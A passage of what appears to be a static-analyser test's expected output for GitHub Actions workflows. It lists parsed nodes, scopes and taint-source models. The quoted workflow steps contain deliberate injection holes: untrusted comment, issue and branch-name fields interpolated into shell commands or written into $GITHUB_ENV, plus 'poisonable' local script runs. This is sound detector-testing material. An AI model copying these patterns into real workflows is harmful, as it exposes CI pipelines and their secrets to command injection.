.github/workflows/expression_nodes.yml@13:14:15:46 | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:20:6 | .github/workflows/expression_nodes.yml@16:9:20:6 | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:14:19:57 | .github/workflows/expression_nodes.yml@16:14:19:57 | +| .github/workflows/expression_nodes.yml:17:25:17:56 
| github.event.comment.body | .github/workflows/expression_nodes.yml:17:25:17:56 | .github/workflows/expression_nodes.yml@17:25:17:56 | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:18:24:18:51 | .github/workflows/expression_nodes.yml@18:24:18:51 | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:19:24:19:55 | .github/workflows/expression_nodes.yml@19:24:19:55 | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:21:47 | .github/workflows/expression_nodes.yml@20:9:21:47 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | .github/workflows/multiline2.yml:9:5:89:35 | .github/workflows/multiline2.yml@9:5:89:35 | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:11:9:15:6 | .github/workflows/multiline2.yml@11:9:15:6 | +| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:30:14:33:14 | .github/workflows/multiline2.yml@30:14:33:14 | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline2.yml:32:13:32:39 | .github/workflows/multiline2.yml@32:13:32:39 | +| 
.github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:34:9:40:6 | .github/workflows/multiline2.yml@34:9:40:6 | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:35:14:39:14 | .github/workflows/multiline2.yml@35:14:39:14 | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:40:9:46:6 | .github/workflows/multiline2.yml@40:9:46:6 | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:41:14:45:14 | .github/workflows/multiline2.yml@41:14:45:14 | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:46:9:52:6 | .github/workflows/multiline2.yml@46:9:52:6 | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:47:14:51:14 | .github/workflows/multiline2.yml@47:14:51:14 | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:52:9:58:6 | .github/workflows/multiline2.yml@52:9:58:6 | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:53:14:57:14 | .github/workflows/multiline2.yml@53:14:57:14 | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:58:9:63:6 | .github/workflows/multiline2.yml@58:9:63:6 | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:59:14:62:14 | .github/workflows/multiline2.yml@59:14:62:14 | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:63:9:66:6 | .github/workflows/multiline2.yml@63:9:66:6 | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| 
grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:64:14:65:142 | .github/workflows/multiline2.yml@64:14:65:142 | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:66:9:71:6 | .github/workflows/multiline2.yml@66:9:71:6 | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:14:14:48 | .github/workflows/multiline.yml@11:14:14:48 | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:9:20:6 | .github/workflows/multiline.yml@15:9:20:6 | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:14:19:40 | .github/workflows/multiline.yml@15:14:19:40 | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:9:24:6 | .github/workflows/multiline.yml@20:9:24:6 | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:14:23:40 | .github/workflows/multiline.yml@20:14:23:40 | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:9:30:6 | .github/workflows/multiline.yml@24:9:30:6 | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:14:29:29 | .github/workflows/multiline.yml@24:14:29:29 | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:30:9:34:6 | .github/workflows/multiline.yml@30:9:34:6 | +| .github/workflows/multiline.yml:30:14:33:14 | cat 
<<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:14:33:14 | .github/workflows/multiline.yml@30:14:33:14 | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:32:13:32:39 | .github/workflows/multiline.yml@32:13:32:39 | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:34:9:40:6 | .github/workflows/multiline.yml@34:9:40:6 | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:35:14:39:14 | .github/workflows/multiline.yml@35:14:39:14 | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:40:9:46:6 | .github/workflows/multiline.yml@40:9:46:6 | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:41:14:45:14 | .github/workflows/multiline.yml@41:14:45:14 | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:46:9:52:6 | .github/workflows/multiline.yml@46:9:52:6 | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:47:14:51:14 | .github/workflows/multiline.yml@47:14:51:14 | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:52:9:58:6 | .github/workflows/multiline.yml@52:9:58:6 | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:53:14:57:14 | .github/workflows/multiline.yml@53:14:57:14 | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:58:9:63:6 | .github/workflows/multiline.yml@58:9:63:6 | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:59:14:62:14 | 
.github/workflows/multiline.yml@59:14:62:14 | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:63:9:66:6 | .github/workflows/multiline.yml@63:9:66:6 | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:64:14:65:136 | .github/workflows/multiline.yml@64:14:65:136 | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:66:9:71:6 | .github/workflows/multiline.yml@66:9:71:6 | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:67:14:70:36 | .github/workflows/multiline.yml@67:14:70:36 | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:71:9:78:6 | .github/workflows/multiline.yml@71:9:78:6 | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:72:14:77:29 | .github/workflows/multiline.yml@72:14:77:29 | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:78:9:85:6 | .github/workflows/multiline.yml@78:9:85:6 | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:79:14:84:29 | .github/workflows/multiline.yml@79:14:84:29 | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:9:89:29 | .github/workflows/multiline.yml@85:9:89:29 | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:86:14:89:29 | .github/workflows/multiline.yml@86:14:89:29 | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:46:111 | 
.github/workflows/poisonable_steps.yml@5:5:46:111 | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:9:8:6 | .github/workflows/poisonable_steps.yml@7:9:8:6 | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:14:7:30 | .github/workflows/poisonable_steps.yml@7:14:7:30 | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:8:9:13:6 | .github/workflows/poisonable_steps.yml@8:9:13:6 | +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | .github/workflows/poisonable_steps.yml:11:53:11:75 | .github/workflows/poisonable_steps.yml@11:53:11:75 | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:9:14:6 | .github/workflows/poisonable_steps.yml@13:9:14:6 | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:13:14:13:32 | .github/workflows/poisonable_steps.yml@13:14:13:32 | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:9:15:6 | .github/workflows/poisonable_steps.yml@14:9:15:6 | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:14:14:14:42 | .github/workflows/poisonable_steps.yml@14:14:14:42 | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:9:16:6 | .github/workflows/poisonable_steps.yml@15:9:16:6 | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. 
venv/bin/activate | .github/workflows/poisonable_steps.yml:15:14:15:41 | .github/workflows/poisonable_steps.yml@15:14:15:41 | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:16:9:17:6 | .github/workflows/poisonable_steps.yml@16:9:17:6 | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:16:14:16:42 | .github/workflows/poisonable_steps.yml@16:14:16:42 | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:9:18:6 | .github/workflows/poisonable_steps.yml@17:9:18:6 | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:17:14:17:32 | .github/workflows/poisonable_steps.yml@17:14:17:32 | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:18:9:19:6 | .github/workflows/poisonable_steps.yml@18:9:19:6 | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:18:14:18:36 | .github/workflows/poisonable_steps.yml@18:14:18:36 | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:9:20:6 | .github/workflows/poisonable_steps.yml@19:9:20:6 | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:19:14:19:44 | .github/workflows/poisonable_steps.yml@19:14:19:44 | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:9:21:6 | .github/workflows/poisonable_steps.yml@20:9:21:6 | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:20:14:20:56 | .github/workflows/poisonable_steps.yml@20:14:20:56 | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | 
.github/workflows/poisonable_steps.yml:21:9:22:6 | .github/workflows/poisonable_steps.yml@21:9:22:6 | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:21:14:21:56 | .github/workflows/poisonable_steps.yml@21:14:21:56 | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:9:23:6 | .github/workflows/poisonable_steps.yml@22:9:23:6 | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:22:14:22:40 | .github/workflows/poisonable_steps.yml@22:14:22:40 | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:9:24:6 | .github/workflows/poisonable_steps.yml@23:9:24:6 | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:23:14:23:50 | .github/workflows/poisonable_steps.yml@23:14:23:50 | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:24:9:25:6 | .github/workflows/poisonable_steps.yml@24:9:25:6 | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:24:14:24:29 | .github/workflows/poisonable_steps.yml@24:14:24:29 | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:25:9:26:6 | .github/workflows/poisonable_steps.yml@25:9:26:6 | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:25:14:25:73 | .github/workflows/poisonable_steps.yml@25:14:25:73 | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:26:9:27:6 | .github/workflows/poisonable_steps.yml@26:9:27:6 | +| .github/workflows/poisonable_steps.yml:26:14:26:78 
| python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:26:14:26:78 | .github/workflows/poisonable_steps.yml@26:14:26:78 | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:27:9:28:6 | .github/workflows/poisonable_steps.yml@27:9:28:6 | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:14:27:76 | .github/workflows/poisonable_steps.yml@27:14:27:76 | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:28:9:29:6 | .github/workflows/poisonable_steps.yml@28:9:29:6 | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:14:28:92 | .github/workflows/poisonable_steps.yml@28:14:28:92 | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:29:9:30:6 | .github/workflows/poisonable_steps.yml@29:9:30:6 | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:14:29:42 | .github/workflows/poisonable_steps.yml@29:14:29:42 | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:30:9:31:6 | .github/workflows/poisonable_steps.yml@30:9:31:6 | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:30:14:30:46 | .github/workflows/poisonable_steps.yml@30:14:30:46 | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:31:9:32:6 | .github/workflows/poisonable_steps.yml@31:9:32:6 | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | 
.github/workflows/poisonable_steps.yml:31:14:31:44 | .github/workflows/poisonable_steps.yml@31:14:31:44 | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:32:9:33:6 | .github/workflows/poisonable_steps.yml@32:9:33:6 | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:32:14:32:44 | .github/workflows/poisonable_steps.yml@32:14:32:44 | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:33:9:34:6 | .github/workflows/poisonable_steps.yml@33:9:34:6 | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:33:14:33:35 | .github/workflows/poisonable_steps.yml@33:14:33:35 | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:34:9:35:6 | .github/workflows/poisonable_steps.yml@34:9:35:6 | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:34:14:34:52 | .github/workflows/poisonable_steps.yml@34:14:34:52 | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:35:9:36:6 | .github/workflows/poisonable_steps.yml@35:9:36:6 | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:35:14:35:26 | .github/workflows/poisonable_steps.yml@35:14:35:26 | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:36:9:37:6 | .github/workflows/poisonable_steps.yml@36:9:37:6 | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:36:14:36:86 | .github/workflows/poisonable_steps.yml@36:14:36:86 | +| 
.github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:37:9:38:6 | .github/workflows/poisonable_steps.yml@37:9:38:6 | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:37:14:37:51 | .github/workflows/poisonable_steps.yml@37:14:37:51 | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:38:9:39:6 | .github/workflows/poisonable_steps.yml@38:9:39:6 | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:14:38:45 | .github/workflows/poisonable_steps.yml@38:14:38:45 | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:9:40:6 | .github/workflows/poisonable_steps.yml@39:9:40:6 | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:14:39:55 | .github/workflows/poisonable_steps.yml@39:14:39:55 | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:40:9:41:6 | .github/workflows/poisonable_steps.yml@40:9:41:6 | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:14:40:73 | .github/workflows/poisonable_steps.yml@40:14:40:73 | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:41:9:42:6 | .github/workflows/poisonable_steps.yml@41:9:42:6 | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:14:41:22 | .github/workflows/poisonable_steps.yml@41:14:41:22 | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:42:9:46:111 | 
.github/workflows/poisonable_steps.yml@42:9:46:111 | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:42:14:46:111 | .github/workflows/poisonable_steps.yml@42:14:46:111 | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | .github/workflows/poisonable_steps.yml:44:32:44:50 | .github/workflows/poisonable_steps.yml@44:32:44:50 | +| .github/workflows/shell.yml:5:5:9:2 | Job: job1 | .github/workflows/shell.yml:5:5:9:2 | .github/workflows/shell.yml@5:5:9:2 | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | .github/workflows/shell.yml:7:9:9:2 | .github/workflows/shell.yml@7:9:9:2 | +| .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | .github/workflows/shell.yml:8:14:8:31 | .github/workflows/shell.yml@8:14:8:31 | +| .github/workflows/shell.yml:10:5:14:2 | Job: job2 | .github/workflows/shell.yml:10:5:14:2 | .github/workflows/shell.yml@10:5:14:2 | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | .github/workflows/shell.yml:12:9:14:2 | .github/workflows/shell.yml@12:9:14:2 | +| .github/workflows/shell.yml:12:14:12:23 | echo "foo" | .github/workflows/shell.yml:12:14:12:23 | .github/workflows/shell.yml@12:14:12:23 | +| .github/workflows/shell.yml:15:5:19:2 | Job: job3 | .github/workflows/shell.yml:15:5:19:2 | .github/workflows/shell.yml@15:5:19:2 | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | .github/workflows/shell.yml:17:9:19:2 | .github/workflows/shell.yml@17:9:19:2 | +| .github/workflows/shell.yml:18:14:18:23 | echo "foo" | .github/workflows/shell.yml:18:14:18:23 | .github/workflows/shell.yml@18:14:18:23 | +| .github/workflows/shell.yml:20:5:22:32 | Job: job4 | .github/workflows/shell.yml:20:5:22:32 | .github/workflows/shell.yml@20:5:22:32 | +| .github/workflows/shell.yml:22:9:22:32 | Run Step | 
.github/workflows/shell.yml:22:9:22:32 | .github/workflows/shell.yml@22:9:22:32 | +| .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | .github/workflows/shell.yml:22:14:22:31 | .github/workflows/shell.yml@22:14:22:31 | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:20:23:64 | .github/workflows/test.yml@23:20:23:64 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:27:14:27:63 | .github/workflows/test.yml@27:14:27:63 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:20:27:64 | .github/workflows/test.yml@27:20:27:64 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:29:14:29:54 | 
.github/workflows/test.yml@29:14:29:54 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:15:29:55 | .github/workflows/test.yml@29:15:29:55 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:32:5:40:53 | .github/workflows/test.yml@32:5:40:53 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:40:14:40:52 | .github/workflows/test.yml@40:14:40:52 | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | +scopes +| .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/test.yml:1:1:40:53 | on: push | +sources +| AvraamMavridis/files-changed-action | * | output.CHANGED_FILES | filename | manual | +| AvraamMavridis/files-changed-action | * | output.CHANGED_FILES_EXTENSIONS | filename | manual | +| Rishabh510/Path-lister-action | * | output.paths | filename | manual | +| WyriHaximus/github-action-files-in-commit | * | output.files | filename | manual | +| ab185508/file-type-finder | * | output.extaddpaths | filename | manual | +| ab185508/file-type-finder | * | output.names | filename | manual | +| ab185508/file-type-finder | * | output.paths | filename | manual | +| ahmadnassri/action-changed-files | * | output.files | filename | manual | +| ahmadnassri/action-changed-files | * | output.json | json | manual | +| alessbell/pull-request-comment-branch | * | 
